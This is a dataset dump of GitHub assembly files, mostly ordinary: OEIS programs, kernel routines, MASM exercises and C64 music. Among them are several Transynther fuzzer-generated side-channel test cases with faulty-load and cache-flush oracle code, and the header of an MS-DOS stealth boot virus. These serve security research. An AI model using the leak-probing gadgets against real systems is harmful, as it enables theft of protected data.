max_stars_repo_path stringlengths 3 255 | max_stars_repo_name stringlengths 5 116 | max_stars_count int64 0 107k | id stringlengths 1 7 | content stringlengths 63 1.05M |
|---|---|---|---|---|
MASM_Practice/55_Float.asm | TuringGu/RELearning | 0 | 44031 | .586
.MODEL flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
include msvcrt.inc
includelib user32.lib
includelib kernel32.lib
includelib msvcrt.lib
.data
.code
main PROC
;12.25F
;1100.01
;1.10001 * 2^3
;sign bit (1 bit): 0
;exponent bit(8 bit): 10000010
;mantissa(2... |
ersbch32.asm | jeffareid/erasureb | 0 | 44032 | title ersbch32
; page 80,132
;-----------------------------------------------------------------------;
; ersbch32.asm fast GF(2^8) stuff ;
; Copyright(c) 2020, <NAME> ;
; 2020JUN27 21:15 ;
;-----------------------------------------------------------------------;
nrow equ 20 ;max # rows
mx ... |
oeis/025/A025967.asm | neoneye/loda-programs | 11 | 44033 | ; A025967: Expansion of 1/((1-2x)(1-4x)(1-6x)(1-9x)).
; Submitted by <NAME>
; 1,21,289,3321,34705,343257,3282913,30740457,283960369,2599944633,23667405697,214622461833,1941330570193,17530479823449,158125883415841,1425244488222249,12839878208747377,115635005126816505
mov $1,1
mov $2,$0
mov $3,$0
lpb $2
mov $0,$3
su... |
Kernel/system/asm/io.asm | tmb95/TPE-Arqui | 0 | 44034 | GLOBAL read_port
GLOBAL write_port
GLOBAL read_port_word
GLOBAL write_port_word
GLOBAL read_port_dword
GLOBAL write_port_dword
section .text
;read_port(port)
read_port:
push rbp
mov rbp, rsp
mov rdx, rdi
in al, dx
mov rsp, rbp
pop rbp
ret
;write_port(port, data)
write_port:
push rbp
mov rbp, rsp
mov r... |
Plugins PDK/PDK/Masm/DiEPlug.asm | fobricia/old-DIE | 11 | 44035 | <gh_stars>10-100
; Creating PligIns for DiE MASM by kosfiz
.386
.model flat,stdcall
option casemap:none
include ..\include\windows.inc
include ..\include\kernel32.inc
include ..\include\user32.inc
includelib ..\lib\kernel32.lib
includelib ..\lib\user32.lib
.data
PlugName db "Example Plugin(Masm)",0
infostr db "Exam... |
programs/oeis/168/A168660.asm | neoneye/loda | 22 | 44038 | <gh_stars>10-100
; A168660: a(n) = n^7*(n^3 + 1)/2.
; 0,1,576,30618,532480,4921875,30373056,141649396,537919488,1745783685,5005000000,12978455886,30976598016,68960620183,144680034240,288410625000,549890031616,1008202119561,1785539723328,3065980064770,5120640000000,8340841033371,13281208574656,20714958019548,31703983718... |
9-InterruptsMusic/InterruptsMusic.asm | petriw/Commodore64Programming | 259 | 44039 | <reponame>petriw/Commodore64Programming<filename>9-InterruptsMusic/InterruptsMusic.asm
processor 6502
org $0810
lda #$00
tax
tay
jsr $1000
sei
lda #$7f
sta $dc0d
sta $dd0d
lda #$01
sta $d01a
lda #$1b
ldx #$08
ldy #$14
sta $d011
stx $d016
sty $d018
lda #<irq
ldx #>irq
ldy #$7e
sta $0314
stx $0315... |
programs/oeis/066/A066629.asm | karttu/loda | 0 | 44040 | ; A066629: a(n) = 2*Fibonacci(n+2) + ((-1)^n - 3)/2.
; 1,2,5,8,15,24,41,66,109,176,287,464,753,1218,1973,3192,5167,8360,13529,21890,35421,57312,92735,150048,242785,392834,635621,1028456,1664079,2692536,4356617,7049154,11405773,18454928,29860703,48315632,78176337,126491970,204668309,331160280,535828591,866988872,1402817... |
Transynther/x86/_processed/NONE/_xt_/i9-9900K_12_0xa0_notsx.log_21829_2010.asm | ljhsiun2/medusa | 9 | 44041 | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r14
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x17093, %r14
nop
nop
nop
mfence
movl $0x61626364, (%r14)
nop
nop
xor %r13, %r13
lea addresses_UC_ht+0x16bad, %rbp
and $14289, %rdi
movl $0x61626364, (%rbp)
nop
nop
nop
and $1... |
sbsext/tk2/ed/init.asm | olifink/smsqe | 0 | 44042 | ; SBSEXT_TK2_NET_INIT - TK2 network part initialisation 2018 <NAME>
section tk2
xdef init
xref.l tk2_vers
include 'dev8_keys_qlv'
include 'dev8_keys_sys'
include 'dev8_keys_qdos_sms'
include 'dev8_mac_proc'
init
suba.l a0,a0
lea banner(pc),a1
move.w ut.wtext,a2
jsr (a2)
lea net_procs,a1
move.w sb... |
oeis/297/A297469.asm | neoneye/loda-programs | 11 | 44043 | <reponame>neoneye/loda-programs<filename>oeis/297/A297469.asm
; A297469: Solution (bb(n)) of the system of 3 complementary equations in Comments.
; Submitted by <NAME>
; 2,7,11,17,22,27,31,37,41,47,51,57,62,67,71,77,82,87,91,97,102,107,111,117,121,127,131,137,142,147,151,157,161,167,171,177,182,187,191,197,201,207,211,... |
oeis/022/A022775.asm | neoneye/loda-programs | 11 | 44044 | ; A022775: Place where n-th 1 occurs in A007336.
; Submitted by <NAME>
; 1,3,6,11,17,25,34,44,56,69,84,100,117,136,156,178,201,226,252,279,308,338,370,403,437,473,510,549,589,631,674,718,764,811,860,910,961,1014,1068,1124,1181,1239,1299,1360,1423,1487,1553,1620,1688
mov $2,$0
mov $4,$0
lpb $2
mov $0,$4
sub $2,1
... |
programs/oeis/267/A267144.asm | jmorken/loda | 1 | 44045 | <reponame>jmorken/loda
; A267144: Octagonal numbers with prime indices.
; 8,21,65,133,341,481,833,1045,1541,2465,2821,4033,4961,5461,6533,8321,10325,11041,13333,14981,15841,18565,20501,23585,28033,30401,31621,34133,35425,38081,48133,51221,56033,57685,66305,68101,73633,79381,83333,89441,95765
cal $0,330410 ; a(n) = 6*p... |
doortables.asm | ArchipelagoMW/z3randomizer | 2 | 44047 |
; dungeon tables
; HC HC EP DP AT SP PD MM SW IP TH TT TR GT
org $27f000
CompassBossIndicator:
dw $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000, $0000
TotalKeys: ;27f020
db $04, $04, $02, $04, $04, $06, $06, $06, $05, $06, $01, $03, ... |
DE-LAB-6/main.asm | tustunkok/CMPE236-Labs | 0 | 44048 | ORG 0000H
SJMP MAIN
ORG 0030H
MAIN:
MOV R2, #07D ;X1
MOV R3, #03D ;X2
MOV R4, #04D ;X3
ACALL OBJ ; F(X1,X2,X3) = (X1 + X2)^X3
; F(5, 2, 2) = (5 + 2)²
HALT: SJMP HALT
OBJ: CJNE R4, #00H, FOO_CNT1
MOV A, #01D
SJMP FOO_EXT
FOO_CNT1: MOV A, R2
ADD A, R3
CJNE R4, #01, FOO_CNT2
SJMP FOO_EXT... |
kernel.asm | bilalsaad/realos | 0 | 44049 |
kernel: file format elf32-i386
Disassembly of section .text:
80100000 <multiboot_header>:
80100000: 02 b0 ad 1b 00 00 add 0x1bad(%eax),%dh
80100006: 00 00 add %al,(%eax)
80100008: fe 4f 52 decb 0x52(%edi)
8010000b: e4 0f in $0xf,%al
8010000c <entry>:... |
oeis/295/A295719.asm | neoneye/loda-programs | 11 | 44050 | ; A295719: a(n) = a(n-1) + 3*a(n-2) -2*a(n-3) - 2*a(n-4), where a(0) = 1, a(1) = 3, a(2) = 6, a(3) = 10.
; Submitted by <NAME>
; 1,3,6,10,20,32,60,96,172,276,480,772,1316,2120,3564,5748,9568,15444,25524,41224,67772,109508,179328,289860,473284,765192,1246668,2015956,3279008,5303156,8614932,13934472,22614940,36582180,593... |
oeis/026/A026063.asm | neoneye/loda-programs | 11 | 44051 | ; A026063: dot_product(n,n-1,...2,1)*(6,7,...,n,1,2,3,4,5).
; Submitted by <NAME>
; 71,119,180,255,345,451,574,715,875,1055,1256,1479,1725,1995,2290,2611,2959,3335,3740,4175,4641,5139,5670,6235,6835,7471,8144,8855,9605,10395,11226,12099,13015,13975,14980,16031,17129,18275,19470,20715,22011,23359,24760,26215,27725,29291... |
testsuite/ubivm/expected/if_2.asm | alexgarzao/UOP | 0 | 44052 | Entity start
No options
Constants
0 S start
1 S x
2 I 20
3 I 1
4 I 10
5 S x entre 1 e 10
6 S io.writeln
7 I 11
8 S x entre 11 e 20
9 S x > 20
End
Valid context (always)
No properties
Def start
No parameters
Local variables
0 int x
End
No results
ldconst 2 --> [20]
stvar 0 --> [x... |
Transynther/x86/_processed/AVXALIGN/_st_4k_sm_/i9-9900K_12_0xa0_notsx.log_21829_1806.asm | ljhsiun2/medusa | 9 | 44053 | .global s_prepare_buffers
s_prepare_buffers:
push %r13
push %r9
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x13afb, %r13
xor $23756, %rsi
movl $0x61626364, (%r13)
nop
sub %rsi, %rsi
lea addresses_UC_ht+0x1a12b, %rsi
lea addresses_A_ht+0x687b, %rdi
nop
nop
nop
sub %r9, %r9
mov $17, %rcx
rep mo... |
src/main.asm | wastevensv/hacktunes | 4 | 44055 | <reponame>wastevensv/hacktunes
;; -*- mode: rgbds; -*-
INCLUDE "hardware.inc"
INCLUDE "engine.inc"
; rst vectors are currently unused
SECTION "rst00",ROM0[0]
ret
SECTION "rst08",ROM0[8]
ret
SECTION "rst10",ROM0[$10]
ret
SECTION "rst18",ROM0[$18]
ret
SECTION "rst20",ROM0[$20]
ret
SECTION "rst30... |
Program1(SymbolicIntegerConstants)/SymbIntConst.asm | TomasOchoa/CSCI-231-Program1 | 0 | 44056 | <gh_stars>0
;// Symbolic Integer Constants (SymbIntConst.asm)
;// Write a prgoram that defines symbolic constants for all the
;// days of the week. Create an array variable that uses the
;// symbols as initializers
INCLUDE Irvine32.inc
Monday = 1
Tuesday = 2
Wednesday = 3
Thursday = 4
... |
programs/freedisk.asm | informer2016/MichalOS | 0 | 44057 | ; ------------------------------------------------------------------
; MichalOS Free Space Checker
; ------------------------------------------------------------------
BITS 16
%INCLUDE "michalos.inc"
ORG 100h
start:
call os_report_free_space
call os_int_to_string
mov si, ax
call os_print_string
call os_wait_f... |
Palmtree.Math.Core.Implements/vs_build/x86_Release/memory.asm | rougemeilland/Palmtree.Math.Core.Implements | 0 | 44058 | <reponame>rougemeilland/Palmtree.Math.Core.Implements
; Listing generated by Microsoft (R) Optimizing Compiler Version 19.16.27026.1
TITLE Z:\Sources\Lunor\Repos\rougemeilland\Palmtree.Math.Core.Implements\Palmtree.Math.Core.Implements\memory.c
.686P
.XMM
include listing.inc
.model flat
INCLUDELIB MSVCRT
INCLUD... |
src/util.asm | Xeyler/gb-hello-world | 0 | 44060 | <filename>src/util.asm
INCLUDE "hardware.inc"
INCLUDE "util.inc"
SECTION "input", ROM0
; Returns input in 'a' register
; Bit 7 - Start
; Bit 6 - Select
; Bit 5 - B
; Bit 4 - A
; Bit 3 - Down
; Bit 2 - Up
; Bit 1 - Left
; Bit 0 - Right
; A value of 1 indicates a press
get_input:
ld hl, rP1
ld a, P1F_GET_BTN
ld [hl... |
oeis/214/A214699.asm | neoneye/loda-programs | 11 | 44062 | <reponame>neoneye/loda-programs
; A214699: a(n) = 3*a(n-2) - a(n-3) with a(0)=0, a(1)=3, a(2)=0.
; Submitted by <NAME>(s3.)
; 0,3,0,9,-3,27,-18,84,-81,270,-327,891,-1251,3000,-4644,10251,-16932,35397,-61047,123123,-218538,430416,-778737,1509786,-2766627,5308095,-9809667,18690912,-34737096,65882403,-122902200,232384305,... |
libsrc/_DEVELOPMENT/arch/zx/display/c/sdcc/zx_saddrcleft.asm | jpoikela/z88dk | 640 | 44063 |
; void *zx_saddrcleft(void *saddr)
SECTION code_clib
SECTION code_arch
PUBLIC _zx_saddrcleft
EXTERN asm_zx_saddrcleft
_zx_saddrcleft:
pop af
pop hl
push hl
push af
jp asm_zx_saddrcleft
|
programs/oeis/175/A175864.asm | neoneye/loda | 22 | 44064 | ; A175864: Partial sums of ceiling(n^2/19).
; 0,1,2,3,4,6,8,11,15,20,26,33,41,50,61,73,87,103,121,140,162,186,212,240,271,304,340,379,421,466,514,565,619,677,738,803,872,945,1021,1102,1187,1276,1369,1467,1569,1676,1788,1905,2027,2154,2286,2423,2566,2714,2868,3028,3194,3365,3543,3727,3917,4113,4316,4525,4741,4964,5194,5... |
programs/oeis/097/A097480.asm | neoneye/loda | 22 | 44065 | <reponame>neoneye/loda
; A097480: Positive integers n such that 2n-15 is prime.
; 9,10,11,13,14,16,17,19,22,23,26,28,29,31,34,37,38,41,43,44,47,49,52,56,58,59,61,62,64,71,73,76,77,82,83,86,89,91,94,97,98,103,104,106,107,113,119,121,122,124,127,128,133,136,139,142,143,146,148,149,154,161,163,164,166,173,176,181,182,184,... |
src/sm/tables.asm | PJBoy/alttp_sm_combo_randomizer_rom | 31 | 44066 | <reponame>PJBoy/alttp_sm_combo_randomizer_rom
org $F26000
boss_rewards:
; Table to write what the bosses will reward when killed
; Type Flag Icon Ext
dw $0080, $0001, $4032, $0000 ; Kraid
dw $0080, $0002, $4234, $0000 ; Phantoon
dw $0080, $0004, $4438, $0000 ; Draygon
dw $0080, $0008, $463A, $0000 ; Rid... |
Transynther/x86/_processed/NONE/_xt_/i3-7100_9_0x84_notsx.log_21829_1857.asm | ljhsiun2/medusa | 9 | 44067 | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r8
push %r9
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_UC_ht+0x3d34, %rsi
lea addresses_normal_ht+0x15278, %rdi
nop
nop
nop
and %r12, %r12
mov $32, %rcx
rep movsb
nop
nop
nop
cmp $39689, %r8
lea addresses_D_ht+0x18f5c, %rsi
lea addresses_... |
components/kernel/data.asm | paulscottrobson/z80-machine-forth | 0 | 44069 | <filename>components/kernel/data.asm
; ***************************************************************************************
; ***************************************************************************************
;
; Name : data.asm
; Author : <NAME> (<EMAIL>)
; Date : 13th January 2019
; Purpose : Data are... |
x86/fib/fib.asm | stephenbalaban/programming | 0 | 44070 | ;; Data section
section .data
N dd 33
result dd 0
;; Code Section
section .text
global main
extern printf
;; Iterative Fibonacci sequence
;; R = F_{n-1} + F_{n-2}
;; 1, 1, 2, 3, 5, 8, ...
main:
mov eax, 0 ; N-1
mov ebx, 1 ; N-2
mov esi, [N] ; i
loop:
mov ecx, eax ; Copy N-1 into a temp register
add ea... |
programs/oeis/253/A253470.asm | neoneye/loda | 22 | 44071 | <filename>programs/oeis/253/A253470.asm
; A253470: Indices of centered triangular numbers (A005448) which are also centered pentagonal numbers (A005891).
; 1,5,36,280,2201,17325,136396,1073840,8454321,66560725,524031476,4125691080,32481497161,255726286205,2013328792476,15850904053600,124793903636321,982500325036965,773... |
mips1.asm | Energy0124/MIPS-CSCI3120-WA2 | 0 | 44073 | <gh_stars>0
addi $sp, $sp, -4 # Follow the convention of the lecture note
# for the stack machine where $sp points
# to the next location in the stack.
addi $sp, $sp, -12 # Reserve space to for foo, A, and B
li $a0, 100 # foo is at $sp+12
sw $a0, 12($sp)
sw $... |
Transynther/x86/_processed/NONE/_xt_sm_/i7-7700_9_0x48.log_21829_2423.asm | ljhsiun2/medusa | 9 | 44074 | <reponame>ljhsiun2/medusa<gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r12
push %r13
push %r8
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0x595, %r8
dec %r10
mov (%r8), %si
nop
and %rdi, %rdi
lea addresses_A_ht+0x8a75, %r8
nop
nop
nop
xor $54706, %r13
movups (%r8), %xmm0
vpextrq $1, ... |
data/baseStats_original/lanturn.asm | adhi-thirumala/EvoYellow | 16 | 44077 | ;LanturnBaseStats: ; 38aa6 (e:4aa6)
db DEX_LANTURN ; pokedex id
db 125 ; base hp
db 58 ; base attack
db 58 ; base defense
db 67 ; base speed
db 76 ; base special
db WATER ; species type 1
db ELECTRIC ; species type 2
db 60 ; catch rate, fresh water item
db 161 ; base exp yield
INCBIN "pic/ymon/lanturn.pic",0,1 ; 55, sp... |
programs/oeis/330/A330038.asm | neoneye/loda | 22 | 44079 | <reponame>neoneye/loda
; A330038: a(1) = 1, a(n) = [n/2] + a([n/2]) + a([(n+1)/2]) for n > 1, where [x] = floor(x).
; 1,3,5,8,10,13,16,20,22,25,28,32,35,39,43,48,50,53,56,60,63,67,71,76,79,83,87,92,96,101,106,112,114,117,120,124,127,131,135,140,143,147,151,156,160,165,170,176,179,183,187,192,196,201,206,212,216,221,226... |
Transynther/x86/_processed/US/_zr_/i9-9900K_12_0xa0.log_21829_390.asm | ljhsiun2/medusa | 9 | 44080 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r13
push %r15
push %rbp
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_WT_ht+0xc998, %r10
nop
dec %rdi
movups (%r10), %xmm4
vpextrq $1, %xmm4, %rsi
nop
add %rsi, %rsi
lea addresses_D_ht+0x1a56a, %rbp
and %r15, %r15
vmovups (%rbp), %ymm4
vextracti128 $0... |
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0x48_notsx.log_21829_399.asm | ljhsiun2/medusa | 9 | 44082 | <gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
ret
.global s_faulty_load
s_faulty_load:
push %r12
push %r14
push %r8
push %rbx
push %rcx
push %rdi
// Faulty Load
mov $0x27bd530000000ca5, %r12
nop
nop
xor %rbx, %rbx
mov (%r12), %r8w
lea oracles, %r12
and $0xff, %r8
shlq $12, %r8
mov (%r12,%r8,1), %r8
... |
programs/oeis/093/A093357.asm | neoneye/loda | 22 | 44083 | ; A093357: Number of occurrences of pattern 2-1 after n iterations of morphism A007413.
; 0,4,20,88,368,1504,6080,24448,98048,392704,1571840,6289408,25161728,100655104,402636800,1610579968,6442385408,25769672704,103078952960,412316336128,1649266393088,6597067669504,26388274872320
sub $0,1
mov $1,2
pow $1,$0
mul $1,3
b... |
IntelFsp2Pkg/FspSecCore/Ia32/Fsp22ApiEntryS.nasm | nicklela/edk2 | 3,012 | 44086 | ;; @file
; Provide FSP API entry points.
;
; Copyright (c) 2020, Intel Corporation. All rights reserved.<BR>
; SPDX-License-Identifier: BSD-2-Clause-Patent
;;
SECTION .text
;
; Following functions will be provided in C
;
extern ASM_PFX(FspApiCommon)
extern ASM_PFX(FspMultiPhaseSiInitApiHandler)
;... |
6502EMU/Instructions/STX.asm | austinbentley/6502toAVR | 0 | 44087 | <filename>6502EMU/Instructions/STX.asm
/*
* STX.asm
*
* Created: 5/13/2018 5:28:16 PM
* Author: ROTP
*/
STX_zpg: ;UNTESTED
swapPCwithTEMPPC
ADIW ZH:ZL, 1
dereferencer r22
mov r24, zl
mov r25, zh
mov zl, r22
clr zh
dereferencer_write XR
mov zl, r24
mov zh, r25
ADIW ZH:ZL, 1
RET
STX_zpg_Y: ;... |
src/speed-switch/spsw-ch2-lc-delay-cgbBE.asm | c-sp/age-test-roms | 0 | 44088 | ; Tests how CGB speed switching affects APU length counter timing
;
; Verified:
; 2021-10-21 pass: CPU CGB E - CPU-CGB-06
; 2021-10-21 pass: CPU CGB B - CPU-CGB-02
; 2021-10-21 fail: DMG-CPU C (blob) - DMG-CPU-08
;
INCLUDE "hardware.inc"
DEF CART_COMPATIBILITY EQU CART_COMPATIBLE_GBC
INCLUDE "test-setup.inc"
E... |
programs/oeis/026/A026044.asm | jmorken/loda | 1 | 44090 | <filename>programs/oeis/026/A026044.asm
; A026044: a(n) = (d(n)-r(n))/2, where d = A026043 and r is the periodic sequence with fundamental period (1,1,0,0).
; 22,33,49,70,97,132,176,229,292,367,455,556,671,802,950,1115,1298,1501,1725,1970,2237,2528,2844,3185,3552,3947,4371,4824,5307,5822,6370,6951,7566,8217,8905,9630,1... |
oeis/116/A116563.asm | neoneye/loda-programs | 11 | 44091 | ; A116563: a(n) is the genus of the modular curve X_0(p) for p = prime(n).
; Submitted by <NAME>(s3)
; 0,0,1,0,1,1,2,2,2,2,3,3,4,4,5,4,5,6,5,6,7,7,7,8,8,9,8,9,10,11,11,11,12,12,12,13,14,14,15,14,16,15,16,16,17,18,19,18
add $0,1
seq $0,108245 ; If n-th prime is 4m - 1, then a(n) = 4m + 1. If n-th prime is 4m + 1, then ... |
src/test/ref/index-pointer-rewrite-7.asm | jbrandwood/kickc | 2 | 44092 | <reponame>jbrandwood/kickc
// Test array index pointer rewriting
// 16bit array with 16bit index
// Fibonacci calculation uses adjacent indices inside the loop
// Commodore 64 PRG executable file
.file [name="index-pointer-rewrite-7.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Dat... |
programs/oeis/033/A033144.asm | neoneye/loda | 22 | 44094 | ; A033144: Base 8 digits are, in order, the first n terms of the periodic sequence with initial period 1,0,0.
; 1,8,64,513,4104,32832,262657,2101256,16810048,134480385,1075843080,8606744640,68853957121,550831656968,4406653255744,35253226045953,282025808367624,2256206466940992,18049651735527937,144397213884223496,115517... |
Simulator/Assembly/Header.asm | lilggamegenius/M68KSimulator | 0 | 44095 | <filename>Simulator/Assembly/Header.asm
; ---------------------------------------------------------------------------
; RAM variables - General
RAM_Start: equ $FFFF0000
System_Stack: equ $FFFFFFFF
RAM_End: equ System_Stack
; >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; start of ROM
... |
projects/07/StackArithmetic/SimpleAdd/SimpleAdd.asm | theapi/nand2tetris | 0 | 44096 | // init to SP pointing to 256
@256
D=A
@SP
M=D
// constant
@7
D=A // Store the numeric value in D
// PUSH
@SP
A=M // set the address to where the SP is pointing
M=D // store the value in the stack
@SP
M=M+1 // Advance the stack pointer
// constant
@8
D=A // Store the numeric value in D
// PUSH
@SP
A=M // ... |
lib/N64_RSP.asm | SiliconSloth/tri3d | 8 | 44097 | // Generated from N64_RSP.INC
//==============================
// N64 Reality Signal Processor
//==============================
// RSP CP0 Control Registers (MTF0/MTC0):
c0 equ $0 // RSP CP0 Control Register 00: I/DMEM Address For DMA (RW) ($04040000)
c1 equ $1 // RSP CP0 Control Register 01: DRAM Address For DM... |
Transynther/x86/_processed/AVXALIGN/_zr_/i7-7700_9_0x48.log_21829_2020.asm | ljhsiun2/medusa | 9 | 44098 | .global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r13
push %r15
push %rax
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0x74f6, %rbx
sub $39697, %rdx
mov (%rbx), %r15w
nop
nop
nop
cmp $44276, %rdi
lea addresses_WT_ht+0xc4f6, %rax
nop
nop
inc %r11
vmovups (%rax), %ymm0
vextracti128 $0,... |
Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_1675_958.asm | ljhsiun2/medusa | 9 | 44099 | <filename>Transynther/x86/_processed/NONE/_xt_/i7-7700_9_0xca_notsx.log_1675_958.asm
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r14
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_UC_ht+0x125c1, %rsi
lea addresses_UC_ht+0x1508d, %rdi
clflush (%rdi)
nop
nop
sub %r14, %r14
mov ... |
Transynther/x86/_processed/AVXALIGN/_zr_/i3-7100_9_0x84_notsx.log_21829_2670.asm | ljhsiun2/medusa | 9 | 44101 | .global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %rbp
push %rbx
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WC_ht+0xfb7, %rbx
nop
cmp %rbp, %rbp
movb (%rbx), %r11b
nop
nop
nop
nop
nop
inc %rdi
lea addresses_normal_ht+0x1aa73, %rsi
lea addresses_A_ht+0x1b7e7, %rdi
clflush (%rsi)
clflush (%... |
programs/oeis/013/A013750.asm | neoneye/loda | 22 | 44102 | <reponame>neoneye/loda
; A013750: a(n) = 12^(3*n + 1).
; 12,20736,35831808,61917364224,106993205379072,184884258895036416,319479999370622926848,552061438912436417593344,953962166440690129601298432,1648446623609512543951043690496,2848515765597237675947403497177088
mul $0,3
add $0,1
mov $1,12
pow $1,$0
mov $0,$1
|
programs/oeis/006/A006963.asm | neoneye/loda | 22 | 44103 | ; A006963: Number of planar embedded labeled trees with n nodes: (2n-3)!/(n-1)! for n >= 2, a(1) = 1.
; 1,1,3,20,210,3024,55440,1235520,32432400,980179200,33522128640,1279935820800,53970627110400,2490952020480000,124903451312640000,6761440164390912000,393008709555221760000,24412776311194951680000,1613955767240110694400... |
MSDOS/Virus.MSDOS.Unknown.monkey.asm | fengjixuchui/Family | 3 | 44104 | <filename>MSDOS/Virus.MSDOS.Unknown.monkey.asm
page 70,80
Name Monkey
;*******************************************************
;
; Monkey written at the city of champions
; - Edmonton - by UACVRS - Jan 1992.
;
; Monkey is a full stealth MBR/Boot self-replicating program with
; n... |
oeis/160/A160177.asm | neoneye/loda-programs | 11 | 44105 | ; A160177: Decimal expansion of (633+100*sqrt(2))/617.
; Submitted by <NAME>
; 1,2,5,5,1,3,9,9,6,1,4,8,6,7,2,5,2,9,1,5,3,9,9,8,1,9,6,5,0,2,5,8,8,2,9,9,4,9,0,5,9,4,3,5,7,7,8,5,6,8,7,9,7,5,2,5,4,0,7,9,0,8,8,1,3,5,9,9,2,4,2,2,6,6,5,5,1,2,2,6,9,6,7,3,4,2,6,0,5,4,0,4,0,9,6,6,6,3,8,1
bin $1,$0
mov $2,2
mov $3,$0
mul $3,4
lp... |
engine/drawsprite.asm | mkiesinski/the-way-nes | 2 | 44106 | DrawOneSpriteRow:
STA spriteTileSecnd
JMP DrawSpriteObject
DrawSpriteObject:
LDA spriteDirection ; get flip control bits
LSR A
LSR A ; move d1 into carry
LDA spriteTileFirst
BCC NoHFlip ; if d1 not set, branch
STA SPRITE_TILENUMBER+4,y ;
... |
oeis/139/A139183.asm | neoneye/loda-programs | 11 | 44107 | <filename>oeis/139/A139183.asm
; A139183: a(n) = (n! - 8)/8.
; 2,14,89,629,5039,45359,453599,4989599,59875199,778377599,10897286399,163459295999,2615348735999,44460928511999,800296713215999,15205637551103999,304112751022079999,6386367771463679999,140500090972200959999,3231502092360622079999,77556050216654929919999,1938... |
ECE220/mp1/testthree.asm | debugevent90901/courseArchive | 0 | 44108 | .ORIG x4000
.STRINGZ "
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa aaaaaaaa
AAAAAAAAAAAAAAAAAAAAAAA... |
wof/lcs/123p/16.asm | zengfr/arcade_game_romhacking_sourcecode_top_secret_data | 6 | 44109 | <reponame>zengfr/arcade_game_romhacking_sourcecode_top_secret_data
copyright zengfr site:http://github.com/zengfr/romhack
00478C ext.w D0
005B88 beq $5b90 [123p+ 16, enemy+16]
005BE8 beq $5bec [123p+ 16]
00799E moveq #$0, D0 [123p+ 16, enemy+16]
0079F8 beq $79fc [123p+ 16, enemy+16]
007C18 move.b... |
my Projects/Tmr0example/tmr0eg.asm | simonbrennan/PicMicroASM | 1 | 44110 | <gh_stars>1-10
;**********************************************************
;* Program Name : Timer0 test program *
;* Date written : 24 October 2003 *
;* Description : This program demostrates how to setup *
;* and use the Tmr0 function of PIC *
;* Interupts : Yes, ... |
ls.asm | keibrdn/cs153_lab1 | 0 | 44111 | <gh_stars>0
_ls: file format elf32-i386
Disassembly of section .text:
00000000 <main>:
close(fd);
}
int
main(int argc, char *argv[])
{
0: 55 push %ebp
1: 89 e5 mov %esp,%ebp
3: 57 push %edi
4: 56 push %esi
5: 53 ... |
python_src/other/export/screen_8_1.asm | fjpena/sword-of-ianna-msx2 | 43 | 44112 | <reponame>fjpena/sword-of-ianna-msx2<gh_stars>10-100
org $0000
; Object types
OBJECT_NONE EQU 0
OBJECT_SWITCH EQU 1
OBJECT_DOOR EQU 2
OBJECT_DOOR_DESTROY EQU 3
OBJECT_FLOOR_DESTROY EQU 4
OBJECT_WALL_DESTROY EQU 5
OBJECT_BOX_LEFT EQU 6
OBJECT_BOX_RIGHT EQU 7
OBJECT_JAR EQU 8
OBJECT_TELEPORTER EQU 9
; Pickable object... |
docs/antora/modules/ROOT/pages/nand2tetris/projects/04/mult/mult.asm | peacetrue/learn-nand2tetris | 0 | 44113 | <gh_stars>0
//set R2=0
@2
M=0
//if R0<=0 return
@0
D=M //D=R0
@END
D;JLE //over
//if R1<=0 return
(LOOP)
@1
D=M //D=R1
@END
D;JLE //over
//R1=R1-1
@1
M=D-1
//R2=R2+R0
@0
D=M //D=R0
@2
M=D+M //R2=D+R2
@LOOP
0;JMP
(END)
@END
0;JMP
|
Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_544.asm | ljhsiun2/medusa | 9 | 44114 | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r13
push %r15
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rsi
lea addresses_WC_ht+0xc629, %rdi
nop
sub %rax, %rax
and $0xffffffffffffffc0, %rdi
vmovntdqa (%rdi), %ymm0
vextracti128 $1, %ymm0, %xmm0
vpextrq $1, %xmm0, %r15
nop
nop
nop
nop
xor $26286... |
Transynther/x86/_processed/AVXALIGN/_ht_zr_/i7-7700_9_0xca_notsx.log_21829_1680.asm | ljhsiun2/medusa | 9 | 44115 | <reponame>ljhsiun2/medusa<gh_stars>1-10
.global s_prepare_buffers
s_prepare_buffers:
push %r10
push %r11
push %r14
push %r8
push %rbx
push %rcx
push %rdi
push %rsi
lea addresses_D_ht+0x18555, %rdi
nop
nop
nop
nop
cmp $48122, %r14
mov $0x6162636465666768, %r8
movq %r8, (%rdi)
nop
nop
nop
